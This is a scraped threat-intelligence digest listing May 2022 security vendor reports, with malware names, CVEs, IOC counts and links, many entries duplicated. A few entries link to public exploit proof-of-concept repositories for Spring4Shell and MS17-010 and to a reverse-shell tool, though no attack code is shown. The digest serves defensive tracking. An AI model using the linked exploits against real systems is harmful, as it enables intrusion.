#ParsedReport
05-05-2022
Nigerian Tesla: 419 scammer gone malware distributor unmasked
https://blog.malwarebytes.com/threat-intelligence/2022/05/nigerian-tesla-419-scammer-gone-malware-distributor-unmasked
Threats:
Agent_tesla (tags: phishing, ransomware, malware, spam, stealer, scam, dns, vpn)
Avemaria_rat
Netwire_rat
4shared
Cassandraprotector_tool
Geo:
Nigeria, Nigerian, Ukraine, Ukrainian
IOCs:
File: 2
Email: 25
Domain: 1
05-05-2022
Nigerian Tesla: 419 scammer gone malware distributor unmasked
https://blog.malwarebytes.com/threat-intelligence/2022/05/nigerian-tesla-419-scammer-gone-malware-distributor-unmasked
Threats:
Agent_tesla (tags: phishing, ransomware, malware, spam, stealer, scam, dns, vpn)
Avemaria_rat
Netwire_rat
4shared
Cassandraprotector_tool
Geo:
Nigeria, Nigerian, Ukraine, Ukrainian
IOCs:
File: 2
Email: 25
Domain: 1
Malwarebytes Labs
Nigerian Tesla: 419 scammer gone malware distributor unmasked
Scamming, phishing and other data theft is all part of Nigeria Tesla's portfolio.
#ParsedReport
05-05-2022
Cybercrime loves company: Conti cooperated with other ransomware gangs
https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker
Threats:
Conti (tags: ransomware, malware)
Ryuk (tags: ransomware)
Maze (tags: ransomware)
Lockbit (tags: ransomware)
Ragnarlocker (tags: ransomware)
Emotet (tags: ransomware)
Trickbot
Geo:
Russian
05-05-2022
Cybercrime loves company: Conti cooperated with other ransomware gangs
https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker
Threats:
Conti (tags: ransomware, malware)
Ryuk (tags: ransomware)
Maze (tags: ransomware)
Lockbit (tags: ransomware)
Ragnarlocker (tags: ransomware)
Emotet (tags: ransomware)
Trickbot
Geo:
Russian
Intel471
Cybercrime loves company: Conti cooperated with other ransomware gangs
Conti kept a close eye on other ransomware groups and borrowed some of their techniques and best practices for their own operations.
#ParsedReport
05-05-2022
Shells blooming in Spring
https://labs.k7computing.com/index.php/shells-blooming-in-spring
Threats:
Spring4shell (tags: rat)
Log4shell_vuln (tags: rat)
Mirai
Emotet
CVEs:
CVE-2022-22965 [Vulners]
Vulners: Score: 7.5, CVSS: PENDING,
Vulners: Exploitation: Unknown
X-Force: Risk: 9.8
X-Force: Patch: Official fix
Soft:
- vmware spring framework (<5.2.20, <5.3.18)
- cisco cx cloud agent (<2.1.0)
- oracle communications cloud native core automated test suite (1.9.0, 22.1.0)
- oracle communications cloud native core console (1.9.0, 22.1.0)
- oracle communications cloud native core network exposure function (22.1.0)
have more...
CVE-2022-22695 [Vulners]
CVE-2022-22963 [Vulners]
Vulners: Score: 7.5, CVSS: PENDING,
Vulners: Exploitation: Unknown
X-Force: Risk: 9.8
X-Force: Patch: Official fix
Soft:
- vmware spring cloud function (le3.1.6, le3.2.2)
IOCs:
File: 8
Hash: 1
Links:
05-05-2022
Shells blooming in Spring
https://labs.k7computing.com/index.php/shells-blooming-in-spring
Threats:
Spring4shell (tags: rat)
Log4shell_vuln (tags: rat)
Mirai
Emotet
CVEs:
CVE-2022-22965 [Vulners]
Vulners: Score: 7.5, CVSS: PENDING,
Vulners: Exploitation: Unknown
X-Force: Risk: 9.8
X-Force: Patch: Official fix
Soft:
- vmware spring framework (<5.2.20, <5.3.18)
- cisco cx cloud agent (<2.1.0)
- oracle communications cloud native core automated test suite (1.9.0, 22.1.0)
- oracle communications cloud native core console (1.9.0, 22.1.0)
- oracle communications cloud native core network exposure function (22.1.0)
have more...
CVE-2022-22695 [Vulners]
CVE-2022-22963 [Vulners]
Vulners: Score: 7.5, CVSS: PENDING,
Vulners: Exploitation: Unknown
X-Force: Risk: 9.8
X-Force: Patch: Official fix
Soft:
- vmware spring cloud function (le3.1.6, le3.2.2)
IOCs:
File: 8
Hash: 1
Links:
https://github.com/dinosn/CVE-2022-22963https://github.com/lunasec-io/Spring4Shell-POChttps://github.com/reznok/Spring4Shell-POCK7 Labs
Shells blooming in Spring - K7 Labs
Yet another vulnerability has been reported in the Java platform, this time in the popular Java Spring framework, just a […]
#ParsedReport
06-05-2022
Mobile subscription Trojans and their little tricks
https://securelist.com/mobile-subscription-trojans-and-their-tricks/106412
Threats:
Vesub (tags: trojan, malware)
Triada
Joker (tags: trojan)
Industry:
E-commerce, Financial
Geo:
Russia, Arabia, Russian, Indonesia, Austria, China, Brazil, Saudi, Switzerland, Mexico, Turkey, Egypt, Poland, India, Germany, Africa, Thailand, Belarus, Algeria, Ukraine, Arab, Malaysia, Oman
IOCs:
File: 4
Hash: 37
06-05-2022
Mobile subscription Trojans and their little tricks
https://securelist.com/mobile-subscription-trojans-and-their-tricks/106412
Threats:
Vesub (tags: trojan, malware)
Triada
Joker (tags: trojan)
Industry:
E-commerce, Financial
Geo:
Russia, Arabia, Russian, Indonesia, Austria, China, Brazil, Saudi, Switzerland, Mexico, Turkey, Egypt, Poland, India, Germany, Africa, Thailand, Belarus, Algeria, Ukraine, Arab, Malaysia, Oman
IOCs:
File: 4
Hash: 37
Securelist
The Trojan subscribers Joker, MobOk, Vesub and GriftHorse
Kaspersky analysis of mobile subscription Trojans Joker (Jocker), MobOk, Vesub and GriftHorse and their activity: technical description and statistics.
#ParsedReport
06-05-2022
macOS Malware Is More Reality Than Myth: Popular Threats and Challenges in Analysis
https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities
Threats:
Applescript
TTPs:
Tactics: 1
Technics: 0
IOCs:
File: 2
Hash: 9
06-05-2022
macOS Malware Is More Reality Than Myth: Popular Threats and Challenges in Analysis
https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities
Threats:
Applescript
TTPs:
Tactics: 1
Technics: 0
IOCs:
File: 2
Hash: 9
crowdstrike.com
How CrowdStrike Analyzes macOS Malware to Optimize Automated Detection
Learn how CrowdStrike macOS malware research is turned into expert input and knowledge that’s used to optimize the automated detection capabilities of the Falcon platform.
#ParsedReport
06-05-2022
Raspberry Robin gets the worm early
https://redcanary.com/blog/raspberry-robin
Threats:
Raspberry_robin (tags: rat, malware)
TTPs:
Tactics: 5
Technics: 5
IOCs:
File: 11
Path: 6
Domain: 2
Hash: 2
Registry: 1
Url: 2
06-05-2022
Raspberry Robin gets the worm early
https://redcanary.com/blog/raspberry-robin
Threats:
Raspberry_robin (tags: rat, malware)
TTPs:
Tactics: 5
Technics: 5
IOCs:
File: 11
Path: 6
Domain: 2
Hash: 2
Registry: 1
Url: 2
Red Canary
Raspberry Robin gets the worm early
Raspberry Robin is a worm spread by external drives that leverages Windows Installer to download a malicious DLL.
#ParsedReport
06-05-2022
Bad Rabbit Ransomware
https://www.varonis.com/blog/bad-rabbit-ransomware
Actors/Campaigns:
Sandworm
Threats:
Watering_hole_technique
Imminentmonitor_rat
Mimikatz
Mamba
Stop
Industry:
Financial
Geo:
Russia, Ukraines, Russian, Japan
CVEs:
CVE-2017-0145 [Vulners]
Vulners: Score: 9.3, CVSS: 8.9,
Vulners: Exploitation: True
X-Force: Risk: 9.8
X-Force: Patch: Official fix
Soft:
- microsoft server message block (1.0)
IOCs:
Domain: 1
IP: 1
Url: 26
Hash: 6
Links:
06-05-2022
Bad Rabbit Ransomware
https://www.varonis.com/blog/bad-rabbit-ransomware
Actors/Campaigns:
Sandworm
Threats:
Watering_hole_technique
Imminentmonitor_rat
Mimikatz
Mamba
Stop
Industry:
Financial
Geo:
Russia, Ukraines, Russian, Japan
CVEs:
CVE-2017-0145 [Vulners]
Vulners: Score: 9.3, CVSS: 8.9,
Vulners: Exploitation: True
X-Force: Risk: 9.8
X-Force: Patch: Official fix
Soft:
- microsoft server message block (1.0)
IOCs:
Domain: 1
IP: 1
Url: 26
Hash: 6
Links:
https://github.com/worawit/MS17-010/blob/master/zzz\_exploit.pyVaronis
Bad Rabbit Ransomware
Bad Rabbit is a ransomware strain that spread via hacked websites, infected systems via a fake Adobe installer and held encrypted files for Bitcoin.
#ParsedReport
06-05-2022
Emotet: New Delivery Mechanism to Bypass VBA Protection
https://www.netskope.com/blog/emotet-new-delivery-mechanism-to-bypass-vba-protection
Threats:
Emotet (tags: botnet, rat, trojan, malware, phishing, fraud)
Trickbot
Spring4shell
Industry:
Financial
IOCs:
File: 9
Hash: 143
Url: 12
IP: 67
YARA: Found
Links:
06-05-2022
Emotet: New Delivery Mechanism to Bypass VBA Protection
https://www.netskope.com/blog/emotet-new-delivery-mechanism-to-bypass-vba-protection
Threats:
Emotet (tags: botnet, rat, trojan, malware, phishing, fraud)
Trickbot
Spring4shell
Industry:
Financial
IOCs:
File: 9
Hash: 143
Url: 12
IP: 67
YARA: Found
Links:
https://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/Emotet/IOCs/2022-05-06https://github.com/netskopeoss/NetskopeThreatLabsIOCs/blob/main/Emotet/IOCs/script/decrypt\_payload.pyhttps://github.com/netskopeoss/NetskopeThreatLabsIOCs/blob/main/Emotet/IOCs/script/decrypt\_c2.pyhttps://github.com/netskopeoss/NetskopeThreatLabsIOCs/tree/main/EmotetNetskope
Emotet: New Delivery Mechanism to Bypass VBA Protection
Summary Emotet started as a banking trojan in 2014 and later evolved to what has been considered the world's most dangerous malware by Europol, often used
PhD2022_IoCs_Scoring_v2.pdf
880.5 KB
Сегодня на PhDays рассказал про то как у нас в RST Cloud работает скоринг индикаторов.
Вот преза, кстати :)
Вот преза, кстати :)
🔥3
#ParsedReport
19-05-2022
Space Pirates: Explore the tools and connections of a new hacker group
https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/space-pirates-tools-and-connections
Actors/Campaigns:
Spacepirates (tags: dropper, malware, dns, backdoor, rat, phishing, proxy)
Axiom
Emissary_panda
Ta428
Red_delta
Redfoxtrot
Stealthytrident
Nightscout
Threats:
Zupdax (tags: rat)
Former_first_rat
Climax_loader
Rtlshare
Plugx_rat (tags: backdoor, dropper)
9002 (tags: rat)
Deed_rat (tags: dns, rat)
Pcshare
Poison_ivy
Shadowpad
Revbshell
Tmanger
Albaniiutas_rat
Bluetraveller_rat
Hyperbro
Smokeloader_backdoor
Reactorbot
Gh0st_rat
Chromepass_tool
Industry:
Aerospace, Financial, Government, Energy
Geo:
Asian, Chinese, Russia, Mongolia, Georgia, Japanese
CVEs:
CVE-2017-0213 [Vulners]
Vulners: Score: 1.9, CVSS: 6.4,
Vulners: Exploitation: True
X-Force: Risk: 7
X-Force: Patch: Official fix
Soft:
- microsoft windows 10 (1607, -, 1511, 1703)
- microsoft windows rt 8.1 (*)
- microsoft windows server 2012 (-, r2)
- microsoft windows server 2008 (r2, *)
- microsoft windows 8.1 (*)
have more...
TTPs:
Tactics: 10
Technics: 54
IOCs:
File: 51
Path: 20
Email: 1
IP: 23
Hash: 156
Registry: 8
Links:
19-05-2022
Space Pirates: Explore the tools and connections of a new hacker group
https://www.ptsecurity.com/ru-ru/research/pt-esc-threat-intelligence/space-pirates-tools-and-connections
Actors/Campaigns:
Spacepirates (tags: dropper, malware, dns, backdoor, rat, phishing, proxy)
Axiom
Emissary_panda
Ta428
Red_delta
Redfoxtrot
Stealthytrident
Nightscout
Threats:
Zupdax (tags: rat)
Former_first_rat
Climax_loader
Rtlshare
Plugx_rat (tags: backdoor, dropper)
9002 (tags: rat)
Deed_rat (tags: dns, rat)
Pcshare
Poison_ivy
Shadowpad
Revbshell
Tmanger
Albaniiutas_rat
Bluetraveller_rat
Hyperbro
Smokeloader_backdoor
Reactorbot
Gh0st_rat
Chromepass_tool
Industry:
Aerospace, Financial, Government, Energy
Geo:
Asian, Chinese, Russia, Mongolia, Georgia, Japanese
CVEs:
CVE-2017-0213 [Vulners]
Vulners: Score: 1.9, CVSS: 6.4,
Vulners: Exploitation: True
X-Force: Risk: 7
X-Force: Patch: Official fix
Soft:
- microsoft windows 10 (1607, -, 1511, 1703)
- microsoft windows rt 8.1 (*)
- microsoft windows server 2012 (-, r2)
- microsoft windows server 2008 (r2, *)
- microsoft windows 8.1 (*)
have more...
TTPs:
Tactics: 10
Technics: 54
IOCs:
File: 51
Path: 20
Email: 1
IP: 23
Hash: 156
Registry: 8
Links:
https://translate.google.com/website?sl=auto&tl=en&hl=ru&client=webapp&u=https://github.com/obfuscator-llvm/obfuscator/wiki/Control-Flow-Flattening
https://translate.google.com/website?sl=auto&tl=en&hl=ru&client=webapp&u=https://github.com/bitsadmin/ReVBShell
https://translate.google.com/website?sl=auto&tl=en&hl=ru&client=webapp&u=https://github.com/vzex/dog-tunnel
https://translate.google.com/website?sl=auto&tl=en&hl=ru&client=webapp&u=https://github.com/LiveMirror/pcshareptsecurity.com
Блог PT ESC Threat Intelligence
В этом блоге вы можете найти информацию об актуальных атаках хакерских группировок по всему миру, разбор их инструментов, информацию об инцидентах, TTP группировок, индикаторы компрометации и названия детектов в наших продуктах
#ParsedReport
19-05-2022
Phishing Campaign Delivering Three Fileless Malware: AveMariaRAT / BitRAT / PandoraHVNC Part I
https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware
Actors/Campaigns:
Keksec (tags: malware, phishing)
Threats:
Avemaria_rat (tags: ransomware, spam, malware, phishing, rat, ddos, proxy, botnet)
Sbit_rat (tags: ransomware, spam, malware, phishing, rat, ddos, proxy, botnet)
Pandorahvnc (tags: spam, botnet, malware, phishing, rat, ddos, proxy, ransomware)
Emotet (tags: malware, phishing)
Enemybot (tags: malware, phishing)
Vba/agent.ddon!tr (tags: malware)
Industry:
Financial
IOCs:
File: 17
Url: 5
Path: 2
Hash: 3
19-05-2022
Phishing Campaign Delivering Three Fileless Malware: AveMariaRAT / BitRAT / PandoraHVNC Part I
https://www.fortinet.com/blog/threat-research/phishing-campaign-delivering-fileless-malware
Actors/Campaigns:
Keksec (tags: malware, phishing)
Threats:
Avemaria_rat (tags: ransomware, spam, malware, phishing, rat, ddos, proxy, botnet)
Sbit_rat (tags: ransomware, spam, malware, phishing, rat, ddos, proxy, botnet)
Pandorahvnc (tags: spam, botnet, malware, phishing, rat, ddos, proxy, ransomware)
Emotet (tags: malware, phishing)
Enemybot (tags: malware, phishing)
Vba/agent.ddon!tr (tags: malware)
Industry:
Financial
IOCs:
File: 17
Url: 5
Path: 2
Hash: 3
Fortinet Blog
Phishing Campaign Delivering Three Fileless Malware: AveMariaRAT / BitRAT / PandoraHVNC – Part I
FortiGuard Labs discovered a phishing campaign delivering fileless malware to steal sensitive information from a victim’s device. Read our analysis to find out more about how the campaign executes …
#ParsedReport
19-05-2022
The BlackByte ransomware group is striking users all over the globe
http://blog.talosintelligence.com/2022/05/the-blackbyte-ransomware-group-is.html
Threats:
Blackbyte (tags: vpn, phishing, malware, ransomware)
Lolbin
Anydesk_tool
Proxyshell_vuln
Psexec_tool
Industry:
Financial
Geo:
Mexico, Netherlands, America, China, Colombia, Vietnam
IOCs:
File: 5
Path: 1
Links:
19-05-2022
The BlackByte ransomware group is striking users all over the globe
http://blog.talosintelligence.com/2022/05/the-blackbyte-ransomware-group-is.html
Threats:
Blackbyte (tags: vpn, phishing, malware, ransomware)
Lolbin
Anydesk_tool
Proxyshell_vuln
Psexec_tool
Industry:
Financial
Geo:
Mexico, Netherlands, America, China, Colombia, Vietnam
IOCs:
File: 5
Path: 1
Links:
https://github.com/Neo23x0/RaccineCisco Talos Blog
The BlackByte ransomware group is striking users all over the globe
News summary
* Cisco Talos has been monitoring the BlackByte Ransomware Group for several months, infecting victims all over the world, from North America to Colombia, Netherlands, China, Mexico and Vietnam.
* The FBI released a joint cybersecurity advisory…
* Cisco Talos has been monitoring the BlackByte Ransomware Group for several months, infecting victims all over the world, from North America to Colombia, Netherlands, China, Mexico and Vietnam.
* The FBI released a joint cybersecurity advisory…
#ParsedReport
19-05-2022
Chaos Ransomware Variant Sides with Russia
https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-sides-with-russia
Threats:
Chaos (tags: phishing, ransomware, malware)
Conti (tags: ransomware)
Lockbit (tags: ransomware)
Filecoder
Industry:
Financial
Geo:
Russia, Japanese, Ukraine
TTPs:
Tactics: 5
Technics: 6
IOCs:
File: 1
Hash: 1
19-05-2022
Chaos Ransomware Variant Sides with Russia
https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-sides-with-russia
Threats:
Chaos (tags: phishing, ransomware, malware)
Conti (tags: ransomware)
Lockbit (tags: ransomware)
Filecoder
Industry:
Financial
Geo:
Russia, Japanese, Ukraine
TTPs:
Tactics: 5
Technics: 6
IOCs:
File: 1
Hash: 1
Fortinet Blog
Chaos Ransomware Variant Sides with Russia
FortiGuard Labs recently came across a variant of Chaos ransomware that appears to side with Russia. Read to find out more about the destructive outcome the variant beings to a compromised machine.…
#ParsedReport
19-05-2022
New SYK Crypter Distributed Via Discord
https://blog.morphisec.com/syk-crypter-discord
Threats:
Babadeda (tags: ransomware)
Dnetloader (tags: rat, ransomware, malware, stealer)
Asyncrat_rat (tags: ransomware)
Njrat_rat (tags: ransomware)
Quasar_rat (tags: ransomware)
Avemaria_rat (tags: ransomware)
Nanocore_rat (tags: ransomware)
Redline_stealer (tags: ransomware)
Agent_tesla
TTPs:
Tactics: 2
Technics: 0
IOCs:
File: 6
Url: 26
Domain: 17
IP: 2
Path: 5
Hash: 47
19-05-2022
New SYK Crypter Distributed Via Discord
https://blog.morphisec.com/syk-crypter-discord
Threats:
Babadeda (tags: ransomware)
Dnetloader (tags: rat, ransomware, malware, stealer)
Asyncrat_rat (tags: ransomware)
Njrat_rat (tags: ransomware)
Quasar_rat (tags: ransomware)
Avemaria_rat (tags: ransomware)
Nanocore_rat (tags: ransomware)
Redline_stealer (tags: ransomware)
Agent_tesla
TTPs:
Tactics: 2
Technics: 0
IOCs:
File: 6
Url: 26
Domain: 17
IP: 2
Path: 5
Hash: 47
Morphisec
SYK Crypter Distributing Malware Families Via Discord
As Discord’s popularity surges, a new SYK crypter is being used to deliver malware families via the community chat platform.
#ParsedReport
20-05-2022
Why Remediation Alone Is Not Enough When Infected by Malware
https://asec.ahnlab.com/en/34549
Actors/Campaigns:
Darkside (tags: malware)
Threats:
Cobalt_strike (tags: malware)
Runminer
Reverserdp_technique
Dropper/win.agent
Dropper/win32.agent
Nbtscan_tool
Malware/win64.generic
Win_loader
Geo:
Korean
CVEs:
CVE-2017-10271 [Vulners]
Vulners: Score: 5.0, CVSS: 4.9,
Vulners: Exploitation: True
X-Force: Risk: 9.8
X-Force: Patch: Official fix
Soft:
- oracle weblogic server (10.3.6.0.0, 12.2.1.1.0, 12.1.3.0.0, 12.2.1.2.0)
IOCs:
IP: 6
File: 4
Hash: 21
20-05-2022
Why Remediation Alone Is Not Enough When Infected by Malware
https://asec.ahnlab.com/en/34549
Actors/Campaigns:
Darkside (tags: malware)
Threats:
Cobalt_strike (tags: malware)
Runminer
Reverserdp_technique
Dropper/win.agent
Dropper/win32.agent
Nbtscan_tool
Malware/win64.generic
Win_loader
Geo:
Korean
CVEs:
CVE-2017-10271 [Vulners]
Vulners: Score: 5.0, CVSS: 4.9,
Vulners: Exploitation: True
X-Force: Risk: 9.8
X-Force: Patch: Official fix
Soft:
- oracle weblogic server (10.3.6.0.0, 12.2.1.1.0, 12.1.3.0.0, 12.2.1.2.0)
IOCs:
IP: 6
File: 4
Hash: 21
ASEC
Why Remediation Alone Is Not Enough When Infected by Malware - ASEC
In January 2022, a prominent Korean company in the manufacturing industry had many of its internal systems infected by the Darkside ransomware. As the ransomware was found to be distributed using the AD group policy, AhnLab attempted to conduct a DC server…
#ParsedReport
20-05-2022
Emotet Being Distributed Using Various Files
https://asec.ahnlab.com/en/34556
Threats:
Emotet (tags: rat, trojan, malware)
Findpos
Trojan/win.agent.r488899
Industry:
Financial
Geo:
Korea
IOCs:
Url: 18
File: 24
Path: 1
Hash: 4
20-05-2022
Emotet Being Distributed Using Various Files
https://asec.ahnlab.com/en/34556
Threats:
Emotet (tags: rat, trojan, malware)
Findpos
Trojan/win.agent.r488899
Industry:
Financial
Geo:
Korea
IOCs:
Url: 18
File: 24
Path: 1
Hash: 4
ASEC BLOG
Emotet Being Distributed Using Various Files - ASEC BLOG
The ASEC analysis team has recently discovered the distribution of Emotet through link files (.lnk). The malware has been steadily distributed in the past, but starting from April, it was found that the Emotet downloader uses Excel files as well as link files…
#ParsedReport
20-05-2022
XLL malware distributed through mail
https://asec-ahnlab-com.translate.goog/ko/34497/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=ru&_x_tr_pto=wapp
Threats:
Lokibot_stealer (tags: malware)
Trojan/win.agent.c5025449 (tags: malware)
Ransomware/win.carlos.c5025252 (tags: malware)
Geo:
Korea
IOCs:
File: 4
Url: 3
Hash: 5
20-05-2022
XLL malware distributed through mail
https://asec-ahnlab-com.translate.goog/ko/34497/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=ru&_x_tr_pto=wapp
Threats:
Lokibot_stealer (tags: malware)
Trojan/win.agent.c5025449 (tags: malware)
Ransomware/win.carlos.c5025252 (tags: malware)
Geo:
Korea
IOCs:
File: 4
Url: 3
Hash: 5
ASEC BLOG
메일을 통해 유포되는 XLL 악성코드 - ASEC BLOG
그동안 악성코드는 다양한 형태와 방식으로 변화하며 제작되고 유포되고 있다. 그러한 변화들을 안랩 분석팀에서는 적극적으로 모니터링하며 분석하고 제품에 진단 반영되도록 하고있다. 이번에는 작년부터 유포정황이 확인된 XLL형식의 악성코드에 대해 소개하고자 한다. .xll 확장자로 동작 가능한 XLL 파일은 Microsoft Excel(엑셀)의 추가 기능 파일로 해당 MS Excel을 통해 파일을 실행 할 수 있다. 특이한 점은 실행은 MS Excel로 되어…
#ParsedReport
20-05-2022
Weaponization of Excel Add-Ins Part 2: Dridex Infection Chain Case Studies
https://unit42.paloaltonetworks.com/excel-add-ins-dridex-infection-chain
Threats:
Dridex (tags: malware, rat, dropper)
Agent_tesla
Atomic_bombing_technique
Geo:
Japan, Apac, Emea, America
IOCs:
File: 2
Hash: 6338
Url: 1496
IP: 4
Links:
20-05-2022
Weaponization of Excel Add-Ins Part 2: Dridex Infection Chain Case Studies
https://unit42.paloaltonetworks.com/excel-add-ins-dridex-infection-chain
Threats:
Dridex (tags: malware, rat, dropper)
Agent_tesla
Atomic_bombing_technique
Geo:
Japan, Apac, Emea, America
IOCs:
File: 2
Hash: 6338
Url: 1496
IP: 4
Links:
https://github.com/pan-unit42/iocs/blob/master/Dridex%20Infection%20Chain%20Case%20StudiesUnit 42
Weaponization of Excel Add-Ins Part 2: Dridex Infection Chain Case Studies
We discuss XLL and XLM droppers that deliver Dridex samples. We cover examples of the Dridex infection chain.
#ParsedReport
20-05-2022
SpiderLabs Blog. Interactive Phishing: Using Chatbot-like Web Applications to Harvest Information
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/interactive-phishing-using-chatbot-like-web-applications-to-harvest-information
Actors/Campaigns:
Harvester (tags: phishing)
IOCs:
Url: 16
20-05-2022
SpiderLabs Blog. Interactive Phishing: Using Chatbot-like Web Applications to Harvest Information
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/interactive-phishing-using-chatbot-like-web-applications-to-harvest-information
Actors/Campaigns:
Harvester (tags: phishing)
IOCs:
Url: 16
Trustwave
Interactive Phishing: Using Chatbot-like Web Applications to Harvest Information | Trustwave
The Trustwave SpiderLabs Email Security team identified a phishing campaign pretending to be a missed package from DHL. What’s interesting about this campaign is that clicking on the link leads to a chatbot that discusses the missed package, provides pictures…
#ParsedReport
20-05-2022
PDF Malware Is Not Yet Dead
https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead
Threats:
Snake_keylogger
CVEs:
CVE-2017-11882 [Vulners]
Vulners: Score: 9.3, CVSS: 8.3,
Vulners: Exploitation: True
X-Force: Risk: 7.8
X-Force: Patch: Official fix
Soft:
- microsoft office (2013, 2010, 2016, 2007)
IOCs:
File: 3
Hash: 6
Url: 3
Domain: 1
Links:
20-05-2022
PDF Malware Is Not Yet Dead
https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead
Threats:
Snake_keylogger
CVEs:
CVE-2017-11882 [Vulners]
Vulners: Score: 9.3, CVSS: 8.3,
Vulners: Exploitation: True
X-Force: Risk: 7.8
X-Force: Patch: Official fix
Soft:
- microsoft office (2013, 2010, 2016, 2007)
IOCs:
File: 3
Hash: 6
Url: 3
Domain: 1
Links:
https://github.com/decalage2/oletools/wiki/oleidhttps://github.com/decalage2/oletools/wiki/rtfobjHP Wolf Security
PDF Malware Is Not Yet Dead | HP Wolf Security
Don’t let cyber threats get the best of you. Read our post, PDF Malware Is Not Yet Dead, to learn more about cyber threats and cyber security.
#ParsedReport
20-05-2022
Mirai Malware Variants for Linux Double Down on Stronger Chips in Q1 2022
https://www.crowdstrike.com/blog/linux-mirai-malware-double-on-stronger-chips
Threats:
Mirai (tags: rat, malware, proxy, botnet, ddos)
Log4shell_vuln
Satori
Mozi
Bashlite
Xorddos
Industry:
Iot
IOCs:
Hash: 10
20-05-2022
Mirai Malware Variants for Linux Double Down on Stronger Chips in Q1 2022
https://www.crowdstrike.com/blog/linux-mirai-malware-double-on-stronger-chips
Threats:
Mirai (tags: rat, malware, proxy, botnet, ddos)
Log4shell_vuln
Satori
Mozi
Bashlite
Xorddos
Industry:
Iot
IOCs:
Hash: 10
crowdstrike.com
Mirai Malware for Linux Double Down on Stronger Chips | CrowdStrike
Mirai malware variants that target Linux devices have doubled on stronger Intel-powered chips in Q1 2022.